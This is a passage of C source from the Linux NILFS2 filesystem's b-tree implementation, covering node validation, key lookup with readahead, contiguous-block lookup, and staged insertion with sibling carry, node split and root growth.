 * (on-disk blocks must never carry the root flag), or whose child count
 * exceeds what fits in @size bytes.
 *
 * Return Value: If node is broken, 1 is returned. Otherwise, 0 is returned.
 */
static int nilfs_btree_node_broken(const struct nilfs_btree_node *node,
				   size_t size, sector_t blocknr)
{
	int level, flags, nchildren;
	int ret = 0;

	level = nilfs_btree_node_get_level(node);
	flags = nilfs_btree_node_get_flags(node);
	nchildren = nilfs_btree_node_get_nchildren(node);

	if (unlikely(level < NILFS_BTREE_LEVEL_NODE_MIN ||
		     level >= NILFS_BTREE_LEVEL_MAX ||
		     (flags & NILFS_BTREE_NODE_ROOT) ||
		     nchildren < 0 ||
		     nchildren > NILFS_BTREE_NODE_NCHILDREN_MAX(size))) {
		printk(KERN_CRIT "NILFS: bad btree node (blocknr=%llu): "
		       "level = %d, flags = 0x%x, nchildren = %d\n",
		       (unsigned long long)blocknr, level, flags, nchildren);
		ret = 1;
	}
	return ret;
}
/*
 * Validate a freshly read btree node block.  A buffer already marked
 * "checked" is trusted; otherwise the block is verified and, if sound,
 * marked checked so the verification happens at most once per buffer.
 * Returns 1 if the block is broken, 0 otherwise.
 */
int nilfs_btree_broken_node_block(struct buffer_head *bh)
{
	int ret;

	if (buffer_nilfs_checked(bh))
		return 0;

	ret = nilfs_btree_node_broken((struct nilfs_btree_node *)bh->b_data,
				       bh->b_size, bh->b_blocknr);
	if (likely(!ret))
		set_buffer_nilfs_checked(bh);
	return ret;
}
/* root node lives inline in the bmap's union data, not in a block */
static struct nilfs_btree_node *
nilfs_btree_get_root(const struct nilfs_bmap *btree)
{
	return (struct nilfs_btree_node *)btree->b_u.u_data;
}

/* non-root node at @level, taken from the buffer cached in the path */
static struct nilfs_btree_node *
nilfs_btree_get_nonroot_node(const struct nilfs_btree_path *path, int level)
{
	return (struct nilfs_btree_node *)path[level].bp_bh->b_data;
}

/* sibling node at @level, taken from the sibling buffer in the path */
static struct nilfs_btree_node *
nilfs_btree_get_sib_node(const struct nilfs_btree_path *path, int level)
{
	return (struct nilfs_btree_node *)path[level].bp_sib_bh->b_data;
}

/* tree height = root level + 1 */
static int nilfs_btree_height(const struct nilfs_bmap *btree)
{
	return nilfs_btree_node_get_level(nilfs_btree_get_root(btree)) + 1;
}

/*
 * Return the node at @level along @path and store its maximum child
 * capacity in *@ncmaxp (root and block nodes have different capacities).
 */
static struct nilfs_btree_node *
nilfs_btree_get_node(const struct nilfs_bmap *btree,
		     const struct nilfs_btree_path *path,
		     int level, int *ncmaxp)
{
	struct nilfs_btree_node *node;

	if (level == nilfs_btree_height(btree) - 1) {
		node = nilfs_btree_get_root(btree);
		*ncmaxp = NILFS_BTREE_ROOT_NCHILDREN_MAX;
	} else {
		node = nilfs_btree_get_nonroot_node(path, level);
		*ncmaxp = nilfs_btree_nchildren_per_block(btree);
	}

	return node;
}
/*
 * Sanity check: a node reached at @level of the lookup must record that
 * same level on disk.  Returns 1 (after logging a stack trace) on a
 * mismatch, 0 when the node is consistent.
 */
static int
nilfs_btree_bad_node(struct nilfs_btree_node *node, int level)
{
	if (likely(nilfs_btree_node_get_level(node) == level))
		return 0;

	dump_stack();
	printk(KERN_CRIT "NILFS: btree level mismatch: %d != %d\n",
	       nilfs_btree_node_get_level(node), level);
	return 1;
}
/* Parameters for reading ahead sibling node blocks during a descent. */
struct nilfs_btree_readahead_info {
	struct nilfs_btree_node *node;	/* parent node */
	int max_ra_blocks;		/* max nof blocks to read ahead */
	int index;			/* current index on the parent node */
	int ncmax;			/* nof children in the parent node */
};
/*
 * Read the btree node block at @ptr into *@bhp, optionally submitting
 * readahead for sibling blocks described by @ra.  A -EEXIST from the
 * submit path means the block is already up to date in the cache, so only
 * the consistency check is performed.  Returns 0, or a negative error
 * (-EIO on read failure, -EINVAL if the node fails verification).
 */
static int __nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
				   struct buffer_head **bhp,
				   const struct nilfs_btree_readahead_info *ra)
{
	struct address_space *btnc = &NILFS_BMAP_I(btree)->i_btnode_cache;
	struct buffer_head *bh, *ra_bh;
	sector_t submit_ptr = 0;
	int ret;

	ret = nilfs_btnode_submit_block(btnc, ptr, 0, READ, &bh, &submit_ptr);
	if (ret) {
		if (ret != -EEXIST)
			return ret;
		goto out_check;
	}

	if (ra) {
		int i, n;
		__u64 ptr2;

		/* read ahead sibling nodes */
		for (n = ra->max_ra_blocks, i = ra->index + 1;
		     n > 0 && i < ra->ncmax; n--, i++) {
			ptr2 = nilfs_btree_node_get_ptr(ra->node, i, ra->ncmax);

			ret = nilfs_btnode_submit_block(btnc, ptr2, 0, READA,
							&ra_bh, &submit_ptr);
			if (likely(!ret || ret == -EEXIST))
				brelse(ra_bh);
			else if (ret != -EBUSY)
				break;
			/* stop issuing readahead as soon as bh completes */
			if (!buffer_locked(bh))
				goto out_no_wait;
		}
	}

	wait_on_buffer(bh);

 out_no_wait:
	if (!buffer_uptodate(bh)) {
		brelse(bh);
		return -EIO;
	}

 out_check:
	if (nilfs_btree_broken_node_block(bh)) {
		clear_buffer_uptodate(bh);
		brelse(bh);
		return -EINVAL;
	}

	*bhp = bh;
	return 0;
}
/* Read a btree node block without readahead. */
static int nilfs_btree_get_block(const struct nilfs_bmap *btree, __u64 ptr,
				 struct buffer_head **bhp)
{
	return __nilfs_btree_get_block(btree, ptr, bhp, NULL);
}
/*
 * Descend from the root looking for @key, recording the visited node and
 * child index at every level of @path down to @minlevel.  When @readahead
 * is set, sibling readahead is issued at the lowest internal level.
 *
 * On an exact match, stores the found pointer in *@ptrp (if non-NULL) and
 * returns 0; otherwise the path still describes the would-be position and
 * -ENOENT is returned.  -EINVAL signals a corrupted node, other negatives
 * are block-read errors.
 */
static int nilfs_btree_do_lookup(const struct nilfs_bmap *btree,
				 struct nilfs_btree_path *path,
				 __u64 key, __u64 *ptrp, int minlevel,
				 int readahead)
{
	struct nilfs_btree_node *node;
	struct nilfs_btree_readahead_info p, *ra;
	__u64 ptr;
	int level, index, found, ncmax, ret;

	node = nilfs_btree_get_root(btree);
	level = nilfs_btree_node_get_level(node);
	if (level < minlevel || nilfs_btree_node_get_nchildren(node) <= 0)
		return -ENOENT;

	found = nilfs_btree_node_lookup(node, key, &index);
	ptr = nilfs_btree_node_get_ptr(node, index,
				       NILFS_BTREE_ROOT_NCHILDREN_MAX);
	path[level].bp_bh = NULL;
	path[level].bp_index = index;

	ncmax = nilfs_btree_nchildren_per_block(btree);

	while (--level >= minlevel) {
		ra = NULL;
		if (level == NILFS_BTREE_LEVEL_NODE_MIN && readahead) {
			p.node = nilfs_btree_get_node(btree, path, level + 1,
						      &p.ncmax);
			p.index = index;
			p.max_ra_blocks = 7;
			ra = &p;
		}
		ret = __nilfs_btree_get_block(btree, ptr, &path[level].bp_bh,
					      ra);
		if (ret < 0)
			return ret;

		node = nilfs_btree_get_nonroot_node(path, level);
		if (nilfs_btree_bad_node(node, level))
			return -EINVAL;
		/* once @key is matched, always take the leftmost child below */
		if (!found)
			found = nilfs_btree_node_lookup(node, key, &index);
		else
			index = 0;
		if (index < ncmax) {
			ptr = nilfs_btree_node_get_ptr(node, index, ncmax);
		} else {
			WARN_ON(found || level != NILFS_BTREE_LEVEL_NODE_MIN);
			/* insert */
			ptr = NILFS_BMAP_INVALID_PTR;
		}
		path[level].bp_index = index;
	}
	if (!found)
		return -ENOENT;

	if (ptrp != NULL)
		*ptrp = ptr;

	return 0;
}
/*
 * Walk down the rightmost edge of the tree, filling @path, and return the
 * last (largest) key and its pointer via @keyp/@ptrp (each optional).
 * Returns 0 on success, -ENOENT for an empty tree, -EINVAL on a corrupted
 * node, or a block-read error.
 */
static int nilfs_btree_do_lookup_last(const struct nilfs_bmap *btree,
				      struct nilfs_btree_path *path,
				      __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node;
	__u64 ptr;
	int index, level, ncmax, ret;

	node = nilfs_btree_get_root(btree);
	index = nilfs_btree_node_get_nchildren(node) - 1;
	if (index < 0)
		return -ENOENT;
	level = nilfs_btree_node_get_level(node);
	ptr = nilfs_btree_node_get_ptr(node, index,
				       NILFS_BTREE_ROOT_NCHILDREN_MAX);
	path[level].bp_bh = NULL;
	path[level].bp_index = index;
	ncmax = nilfs_btree_nchildren_per_block(btree);

	for (level--; level > 0; level--) {
		ret = nilfs_btree_get_block(btree, ptr, &path[level].bp_bh);
		if (ret < 0)
			return ret;
		node = nilfs_btree_get_nonroot_node(path, level);
		if (nilfs_btree_bad_node(node, level))
			return -EINVAL;
		index = nilfs_btree_node_get_nchildren(node) - 1;
		ptr = nilfs_btree_node_get_ptr(node, index, ncmax);
		path[level].bp_index = index;
	}

	if (keyp != NULL)
		*keyp = nilfs_btree_node_get_key(node, index);
	if (ptrp != NULL)
		*ptrp = ptr;

	return 0;
}
/*
 * Look up @key at @level, storing the matched pointer in *@ptrp.
 * Allocates a temporary path for the descent and frees it before
 * returning the result of nilfs_btree_do_lookup().
 */
static int nilfs_btree_lookup(const struct nilfs_bmap *btree,
			      __u64 key, int level, __u64 *ptrp)
{
	struct nilfs_btree_path *path = nilfs_btree_alloc_path();
	int ret;

	if (!path)
		return -ENOMEM;

	ret = nilfs_btree_do_lookup(btree, path, key, ptrp, level, 0);
	nilfs_btree_free_path(path);

	return ret;
}
/*
 * Look up @key and count how many following keys map to consecutive disk
 * blocks, up to @maxblocks.  When the bmap uses virtual block numbers,
 * each pointer is translated through the DAT before the contiguity test.
 * Scanning continues into right sibling leaf nodes as long as keys and
 * blocks stay consecutive.
 *
 * On success stores the first block in *@ptrp and returns the number of
 * contiguous blocks found; otherwise returns a negative error code.
 */
static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
				     __u64 key, __u64 *ptrp, unsigned maxblocks)
{
	struct nilfs_btree_path *path;
	struct nilfs_btree_node *node;
	struct inode *dat = NULL;
	__u64 ptr, ptr2;
	sector_t blocknr;
	int level = NILFS_BTREE_LEVEL_NODE_MIN;
	int ret, cnt, index, maxlevel, ncmax;
	struct nilfs_btree_readahead_info p;

	path = nilfs_btree_alloc_path();
	if (path == NULL)
		return -ENOMEM;

	ret = nilfs_btree_do_lookup(btree, path, key, &ptr, level, 1);
	if (ret < 0)
		goto out;

	if (NILFS_BMAP_USE_VBN(btree)) {
		dat = nilfs_bmap_get_dat(btree);
		ret = nilfs_dat_translate(dat, ptr, &blocknr);
		if (ret < 0)
			goto out;
		ptr = blocknr;
	}
	cnt = 1;
	if (cnt == maxblocks)
		goto end;

	maxlevel = nilfs_btree_height(btree) - 1;
	node = nilfs_btree_get_node(btree, path, level, &ncmax);
	index = path[level].bp_index + 1;
	for (;;) {
		/* scan the rest of the current leaf node */
		while (index < nilfs_btree_node_get_nchildren(node)) {
			if (nilfs_btree_node_get_key(node, index) !=
			    key + cnt)
				goto end;
			ptr2 = nilfs_btree_node_get_ptr(node, index, ncmax);
			if (dat) {
				ret = nilfs_dat_translate(dat, ptr2, &blocknr);
				if (ret < 0)
					goto out;
				ptr2 = blocknr;
			}
			if (ptr2 != ptr + cnt || ++cnt == maxblocks)
				goto end;
			index++;
			continue;
		}
		if (level == maxlevel)
			break;

		/* look-up right sibling node */
		p.node = nilfs_btree_get_node(btree, path, level + 1, &p.ncmax);
		p.index = path[level + 1].bp_index + 1;
		p.max_ra_blocks = 7;
		if (p.index >= nilfs_btree_node_get_nchildren(p.node) ||
		    nilfs_btree_node_get_key(p.node, p.index) != key + cnt)
			break;
		ptr2 = nilfs_btree_node_get_ptr(p.node, p.index, p.ncmax);
		path[level + 1].bp_index = p.index;

		brelse(path[level].bp_bh);
		path[level].bp_bh = NULL;

		ret = __nilfs_btree_get_block(btree, ptr2, &path[level].bp_bh,
					      &p);
		if (ret < 0)
			goto out;
		node = nilfs_btree_get_nonroot_node(path, level);
		ncmax = nilfs_btree_nchildren_per_block(btree);
		index = 0;
		path[level].bp_index = index;
	}
 end:
	*ptrp = ptr;
	ret = cnt;
 out:
	nilfs_btree_free_path(path);
	return ret;
}
/*
 * Rewrite the key at @path's index starting at @level, and keep promoting
 * it upward while the changed slot is the first (index 0) of its node —
 * only then does the parent's separator key need updating too.
 */
static void nilfs_btree_promote_key(struct nilfs_bmap *btree,
				    struct nilfs_btree_path *path,
				    int level, __u64 key)
{
	if (level < nilfs_btree_height(btree) - 1) {
		do {
			nilfs_btree_node_set_key(
				nilfs_btree_get_nonroot_node(path, level),
				path[level].bp_index, key);
			if (!buffer_dirty(path[level].bp_bh))
				mark_buffer_dirty(path[level].bp_bh);
		} while ((path[level].bp_index == 0) &&
			 (++level < nilfs_btree_height(btree) - 1));
	}

	/* root */
	if (level == nilfs_btree_height(btree) - 1) {
		nilfs_btree_node_set_key(nilfs_btree_get_root(btree),
					 path[level].bp_index, key);
	}
}
/*
 * Insert (*@keyp, *@ptrp) at @level: into the node buffer on the path for
 * non-root levels (promoting the new first key if the insert lands at
 * index 0), or directly into the inline root otherwise.
 */
static void nilfs_btree_do_insert(struct nilfs_bmap *btree,
				  struct nilfs_btree_path *path,
				  int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node;
	int ncblk;

	if (level < nilfs_btree_height(btree) - 1) {
		node = nilfs_btree_get_nonroot_node(path, level);
		ncblk = nilfs_btree_nchildren_per_block(btree);
		nilfs_btree_node_insert(node, path[level].bp_index,
					*keyp, *ptrp, ncblk);
		if (!buffer_dirty(path[level].bp_bh))
			mark_buffer_dirty(path[level].bp_bh);

		if (path[level].bp_index == 0)
			nilfs_btree_promote_key(btree, path, level + 1,
						nilfs_btree_node_get_key(node,
									 0));
	} else {
		node = nilfs_btree_get_root(btree);
		nilfs_btree_node_insert(node, path[level].bp_index,
					*keyp, *ptrp,
					NILFS_BTREE_ROOT_NCHILDREN_MAX);
	}
}
/*
 * Rebalance before insert by shifting children into the left sibling so
 * both nodes end up roughly half full, then perform the insert.  If the
 * insert position itself moves into the left sibling, the path is
 * switched to that sibling first.
 */
static void nilfs_btree_carry_left(struct nilfs_bmap *btree,
				   struct nilfs_btree_path *path,
				   int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *left;
	int nchildren, lnchildren, n, move, ncblk;

	node = nilfs_btree_get_nonroot_node(path, level);
	left = nilfs_btree_get_sib_node(path, level);
	nchildren = nilfs_btree_node_get_nchildren(node);
	lnchildren = nilfs_btree_node_get_nchildren(left);
	ncblk = nilfs_btree_nchildren_per_block(btree);
	move = 0;

	n = (nchildren + lnchildren + 1) / 2 - lnchildren;
	if (n > path[level].bp_index) {
		/* move insert point */
		n--;
		move = 1;
	}

	nilfs_btree_node_move_left(left, node, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);
	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	/* node's first key changed; update the separator in the parent */
	nilfs_btree_promote_key(btree, path, level + 1,
				nilfs_btree_node_get_key(node, 0));

	if (move) {
		brelse(path[level].bp_bh);
		path[level].bp_bh = path[level].bp_sib_bh;
		path[level].bp_sib_bh = NULL;
		path[level].bp_index += lnchildren;
		path[level + 1].bp_index--;
	} else {
		brelse(path[level].bp_sib_bh);
		path[level].bp_sib_bh = NULL;
		path[level].bp_index -= n;
	}

	nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
}
/*
 * Mirror of nilfs_btree_carry_left(): shift children into the right
 * sibling, update the sibling's separator key in the parent, switch the
 * path to the sibling if the insert point moved, then insert.
 */
static void nilfs_btree_carry_right(struct nilfs_bmap *btree,
				    struct nilfs_btree_path *path,
				    int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *right;
	int nchildren, rnchildren, n, move, ncblk;

	node = nilfs_btree_get_nonroot_node(path, level);
	right = nilfs_btree_get_sib_node(path, level);
	nchildren = nilfs_btree_node_get_nchildren(node);
	rnchildren = nilfs_btree_node_get_nchildren(right);
	ncblk = nilfs_btree_nchildren_per_block(btree);
	move = 0;

	n = (nchildren + rnchildren + 1) / 2 - rnchildren;
	if (n > nchildren - path[level].bp_index) {
		/* move insert point */
		n--;
		move = 1;
	}

	nilfs_btree_node_move_right(node, right, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);
	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	/* temporarily aim the parent index at the right sibling's slot */
	path[level + 1].bp_index++;
	nilfs_btree_promote_key(btree, path, level + 1,
				nilfs_btree_node_get_key(right, 0));
	path[level + 1].bp_index--;

	if (move) {
		brelse(path[level].bp_bh);
		path[level].bp_bh = path[level].bp_sib_bh;
		path[level].bp_sib_bh = NULL;
		path[level].bp_index -= nilfs_btree_node_get_nchildren(node);
		path[level + 1].bp_index++;
	} else {
		brelse(path[level].bp_sib_bh);
		path[level].bp_sib_bh = NULL;
	}

	nilfs_btree_do_insert(btree, path, level, keyp, ptrp);
}
/*
 * Split a full node: move about half of its children into the freshly
 * allocated right sibling, insert the new entry on whichever side the
 * insert position lands, and hand back (via *@keyp/*@ptrp) the right
 * node's first key plus the new node's block pointer so the caller can
 * insert the separator into the parent.
 */
static void nilfs_btree_split(struct nilfs_bmap *btree,
			      struct nilfs_btree_path *path,
			      int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *node, *right;
	__u64 newkey;
	__u64 newptr;
	int nchildren, n, move, ncblk;

	node = nilfs_btree_get_nonroot_node(path, level);
	right = nilfs_btree_get_sib_node(path, level);
	nchildren = nilfs_btree_node_get_nchildren(node);
	ncblk = nilfs_btree_nchildren_per_block(btree);
	move = 0;

	n = (nchildren + 1) / 2;
	if (n > nchildren - path[level].bp_index) {
		n--;
		move = 1;
	}

	nilfs_btree_node_move_right(node, right, n, ncblk, ncblk);

	if (!buffer_dirty(path[level].bp_bh))
		mark_buffer_dirty(path[level].bp_bh);
	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	newkey = nilfs_btree_node_get_key(right, 0);
	newptr = path[level].bp_newreq.bpr_ptr;

	if (move) {
		/* insert point moved to the new right node */
		path[level].bp_index -= nilfs_btree_node_get_nchildren(node);
		nilfs_btree_node_insert(right, path[level].bp_index,
					*keyp, *ptrp, ncblk);

		*keyp = nilfs_btree_node_get_key(right, 0);
		*ptrp = path[level].bp_newreq.bpr_ptr;

		brelse(path[level].bp_bh);
		path[level].bp_bh = path[level].bp_sib_bh;
		path[level].bp_sib_bh = NULL;
	} else {
		nilfs_btree_do_insert(btree, path, level, keyp, ptrp);

		*keyp = nilfs_btree_node_get_key(right, 0);
		*ptrp = path[level].bp_newreq.bpr_ptr;

		brelse(path[level].bp_sib_bh);
		path[level].bp_sib_bh = NULL;
	}

	path[level + 1].bp_index++;
}
/*
 * nilfs_btree_grow - add one level to the tree by pushing the root's
 * children down into a newly allocated child node
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_sib_bh holds the new (empty) child node
 * @level: current top non-root level
 * @keyp: out: key to insert into the grown root
 * @ptrp: out: block ptr of the new child node
 */
static void nilfs_btree_grow(struct nilfs_bmap *btree,
			     struct nilfs_btree_path *path,
			     int level, __u64 *keyp, __u64 *ptrp)
{
	struct nilfs_btree_node *root, *child;
	int n, ncblk;

	root = nilfs_btree_get_root(btree);
	child = nilfs_btree_get_sib_node(path, level);
	ncblk = nilfs_btree_nchildren_per_block(btree);

	/* move all of the root's children into the new child node */
	n = nilfs_btree_node_get_nchildren(root);
	nilfs_btree_node_move_right(root, child, n,
				    NILFS_BTREE_ROOT_NCHILDREN_MAX, ncblk);
	nilfs_btree_node_set_level(root, level + 1);

	if (!buffer_dirty(path[level].bp_sib_bh))
		mark_buffer_dirty(path[level].bp_sib_bh);

	path[level].bp_bh = path[level].bp_sib_bh;
	path[level].bp_sib_bh = NULL;

	nilfs_btree_do_insert(btree, path, level, keyp, ptrp);

	/* hand the child's first key / new block ptr up to the root level */
	*keyp = nilfs_btree_node_get_key(child, 0);
	*ptrp = path[level].bp_newreq.bpr_ptr;
}
/*
 * nilfs_btree_find_near - suggest a block pointer near the lookup path
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the key being inserted (may be NULL)
 *
 * Returns the pointer of the left neighbour entry if one exists, else the
 * pointer to this leaf stored in the parent, else NILFS_BMAP_INVALID_PTR.
 */
static __u64 nilfs_btree_find_near(const struct nilfs_bmap *btree,
				   const struct nilfs_btree_path *path)
{
	struct nilfs_btree_node *ref;
	int lv, maxchildren;

	if (!path)
		return NILFS_BMAP_INVALID_PTR;

	/* prefer the entry immediately to the left of the insert point */
	lv = NILFS_BTREE_LEVEL_NODE_MIN;
	if (path[lv].bp_index > 0) {
		ref = nilfs_btree_get_node(btree, path, lv, &maxchildren);
		return nilfs_btree_node_get_ptr(ref, path[lv].bp_index - 1,
						maxchildren);
	}

	/* otherwise fall back to the pointer stored in the parent node */
	lv++;
	if (lv < nilfs_btree_height(btree)) {
		ref = nilfs_btree_get_node(btree, path, lv, &maxchildren);
		return nilfs_btree_node_get_ptr(ref, path[lv].bp_index,
						maxchildren);
	}

	return NILFS_BMAP_INVALID_PTR;
}
/*
 * nilfs_btree_find_target_v - choose a target virtual block number for a
 * new data block
 * @btree: bmap struct of the b-tree
 * @path: lookup path (may be NULL)
 * @key: key of the new block
 *
 * Tries, in order: continuation of a sequential write, a block near the
 * lookup path, and finally a block group based choice.
 */
static __u64 nilfs_btree_find_target_v(const struct nilfs_bmap *btree,
				       const struct nilfs_btree_path *path,
				       __u64 key)
{
	__u64 cand;

	/* sequential access */
	cand = nilfs_bmap_find_target_seq(btree, key);
	if (cand == NILFS_BMAP_INVALID_PTR) {
		/* near the lookup path */
		cand = nilfs_btree_find_near(btree, path);
		if (cand == NILFS_BMAP_INVALID_PTR)
			/* block group */
			cand = nilfs_bmap_find_target_in_group(btree);
	}
	return cand;
}
/*
 * nilfs_btree_prepare_insert - reserve resources and choose the per-level
 * rebalancing operations for an insertion
 * @btree: bmap struct of the b-tree
 * @path: lookup path for @key
 * @levelp: out: highest level at which an operation was staged
 * @key: key to insert
 * @ptr: pointer to insert
 * @stats: out: number of blocks the insertion will add
 *
 * For each level from the leaf up, stages one of do_insert / carry_left /
 * carry_right / split in path[level].bp_op, allocating new node blocks as
 * needed; may stage a grow of the root as the final step.  On error all
 * reservations made so far are rolled back.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_prepare_insert(struct nilfs_bmap *btree,
				      struct nilfs_btree_path *path,
				      int *levelp, __u64 key, __u64 ptr,
				      struct nilfs_bmap_stats *stats)
{
	struct buffer_head *bh;
	struct nilfs_btree_node *node, *parent, *sib;
	__u64 sibptr;
	int pindex, level, ncmax, ncblk, ret;
	struct inode *dat = NULL;

	stats->bs_nblocks = 0;
	level = NILFS_BTREE_LEVEL_DATA;
	/* allocate a new ptr for data block */
	if (NILFS_BMAP_USE_VBN(btree)) {
		path[level].bp_newreq.bpr_ptr =
			nilfs_btree_find_target_v(btree, path, key);
		dat = nilfs_bmap_get_dat(btree);
	}

	ret = nilfs_bmap_prepare_alloc_ptr(btree, &path[level].bp_newreq, dat);
	if (ret < 0)
		goto err_out_data;

	ncblk = nilfs_btree_nchildren_per_block(btree);

	for (level = NILFS_BTREE_LEVEL_NODE_MIN;
	     level < nilfs_btree_height(btree) - 1;
	     level++) {
		node = nilfs_btree_get_nonroot_node(path, level);
		if (nilfs_btree_node_get_nchildren(node) < ncblk) {
			/* node has room: a plain insert suffices */
			path[level].bp_op = nilfs_btree_do_insert;
			stats->bs_nblocks++;
			goto out;
		}

		parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
		pindex = path[level + 1].bp_index;

		/* left sibling */
		if (pindex > 0) {
			sibptr = nilfs_btree_node_get_ptr(parent, pindex - 1,
							  ncmax);
			ret = nilfs_btree_get_block(btree, sibptr, &bh);
			if (ret < 0)
				goto err_out_child_node;
			sib = (struct nilfs_btree_node *)bh->b_data;
			if (nilfs_btree_node_get_nchildren(sib) < ncblk) {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_carry_left;
				stats->bs_nblocks++;
				goto out;
			} else {
				brelse(bh);
			}
		}

		/* right sibling */
		if (pindex < nilfs_btree_node_get_nchildren(parent) - 1) {
			sibptr = nilfs_btree_node_get_ptr(parent, pindex + 1,
							  ncmax);
			ret = nilfs_btree_get_block(btree, sibptr, &bh);
			if (ret < 0)
				goto err_out_child_node;
			sib = (struct nilfs_btree_node *)bh->b_data;
			if (nilfs_btree_node_get_nchildren(sib) < ncblk) {
				path[level].bp_sib_bh = bh;
				path[level].bp_op = nilfs_btree_carry_right;
				stats->bs_nblocks++;
				goto out;
			} else {
				brelse(bh);
			}
		}

		/* split: allocate a new node block just after the ptr
		 * reserved for the level below */
		path[level].bp_newreq.bpr_ptr =
			path[level - 1].bp_newreq.bpr_ptr + 1;
		ret = nilfs_bmap_prepare_alloc_ptr(btree,
						   &path[level].bp_newreq, dat);
		if (ret < 0)
			goto err_out_child_node;
		ret = nilfs_btree_get_new_block(btree,
						path[level].bp_newreq.bpr_ptr,
						&bh);
		if (ret < 0)
			goto err_out_curr_node;

		stats->bs_nblocks++;

		sib = (struct nilfs_btree_node *)bh->b_data;
		nilfs_btree_node_init(sib, 0, level, 0, ncblk, NULL, NULL);
		path[level].bp_sib_bh = bh;
		path[level].bp_op = nilfs_btree_split;
	}

	/* root */
	node = nilfs_btree_get_root(btree);
	if (nilfs_btree_node_get_nchildren(node) <
	    NILFS_BTREE_ROOT_NCHILDREN_MAX) {
		path[level].bp_op = nilfs_btree_do_insert;
		stats->bs_nblocks++;
		goto out;
	}

	/* grow: root is full too, add a new level below it */
	path[level].bp_newreq.bpr_ptr = path[level - 1].bp_newreq.bpr_ptr + 1;
	ret = nilfs_bmap_prepare_alloc_ptr(btree, &path[level].bp_newreq, dat);
	if (ret < 0)
		goto err_out_child_node;
	ret = nilfs_btree_get_new_block(btree, path[level].bp_newreq.bpr_ptr,
					&bh);
	if (ret < 0)
		goto err_out_curr_node;

	nilfs_btree_node_init((struct nilfs_btree_node *)bh->b_data,
			      0, level, 0, ncblk, NULL, NULL);
	path[level].bp_sib_bh = bh;
	path[level].bp_op = nilfs_btree_grow;

	level++;
	path[level].bp_op = nilfs_btree_do_insert;

	/* a newly-created node block and a data block are added */
	stats->bs_nblocks += 2;

	/* success */
 out:
	*levelp = level;
	return ret;

	/* error */
 err_out_curr_node:
	nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
 err_out_child_node:
	/* undo node allocations from the levels below, then the data ptr */
	for (level--; level > NILFS_BTREE_LEVEL_DATA; level--) {
		nilfs_btnode_delete(path[level].bp_sib_bh);
		nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
	}

	nilfs_bmap_abort_alloc_ptr(btree, &path[level].bp_newreq, dat);
 err_out_data:
	*levelp = level;
	stats->bs_nblocks = 0;
	return ret;
}
/*
 * nilfs_btree_commit_insert - execute the insertion staged by
 * nilfs_btree_prepare_insert()
 * @btree: bmap struct of the b-tree
 * @path: lookup path with per-level staged operations (bp_op)
 * @maxlevel: highest level to run an operation at
 * @key: key being inserted
 * @ptr: on entry, the buffer_head of the data block cast to __u64
 */
static void nilfs_btree_commit_insert(struct nilfs_bmap *btree,
				      struct nilfs_btree_path *path,
				      int maxlevel, __u64 key, __u64 ptr)
{
	struct inode *dat = NULL;
	int level;

	/* @ptr carries the data buffer_head; mark it volatile, then
	 * replace it with the newly allocated disk/virtual ptr */
	set_buffer_nilfs_volatile((struct buffer_head *)((unsigned long)ptr));
	ptr = path[NILFS_BTREE_LEVEL_DATA].bp_newreq.bpr_ptr;
	if (NILFS_BMAP_USE_VBN(btree)) {
		nilfs_bmap_set_target_v(btree, key, ptr);
		dat = nilfs_bmap_get_dat(btree);
	}

	for (level = NILFS_BTREE_LEVEL_NODE_MIN; level <= maxlevel; level++) {
		/* commit the ptr reserved for the level below, then run
		 * the staged rebalancing operation for this level */
		nilfs_bmap_commit_alloc_ptr(btree,
					    &path[level - 1].bp_newreq, dat);
		path[level].bp_op(btree, path, level, &key, &ptr);
	}

	if (!nilfs_bmap_dirty(btree))
		nilfs_bmap_set_dirty(btree);
}
/*
 * nilfs_btree_insert - insert a key/pointer pair into the b-tree
 * @btree: bmap struct of the b-tree
 * @key: key to insert
 * @ptr: pointer to insert
 *
 * Returns 0 on success, -EEXIST if @key is already present, -ENOMEM on
 * path allocation failure, or another negative error code.
 */
static int nilfs_btree_insert(struct nilfs_bmap *btree, __u64 key, __u64 ptr)
{
	struct nilfs_bmap_stats stats;
	struct nilfs_btree_path *path;
	int maxlevel, err;

	path = nilfs_btree_alloc_path();
	if (!path)
		return -ENOMEM;

	/* the key must be absent; a successful lookup means a duplicate */
	err = nilfs_btree_do_lookup(btree, path, key, NULL,
				    NILFS_BTREE_LEVEL_NODE_MIN, 0);
	if (err != -ENOENT) {
		if (!err)
			err = -EEXIST;
		goto out;
	}

	err = nilfs_btree_prepare_insert(btree, path, &maxlevel, key, ptr,
					 &stats);
	if (err < 0)
		goto out;
	nilfs_btree_commit_insert(btree, path, maxlevel, key, ptr);
	nilfs_inode_add_blocks(btree->b_inode, stats.bs_nblocks);

 out:
	nilfs_btree_free_path(path);
	return err;
}
/*
 * nilfs_btree_do_delete - remove one entry from the node at @level
 * @btree: bmap struct of the b-tree
 * @path: lookup path; bp_index selects the entry to delete
 * @level: tree level of the node
 * @keyp: out (optional): key of the removed entry
 * @ptrp: out (optional): ptr of the removed entry
 */
static void nilfs_btree_do_delete(struct nilfs_bmap *btree,
				  struct nilfs_btree_path *path,
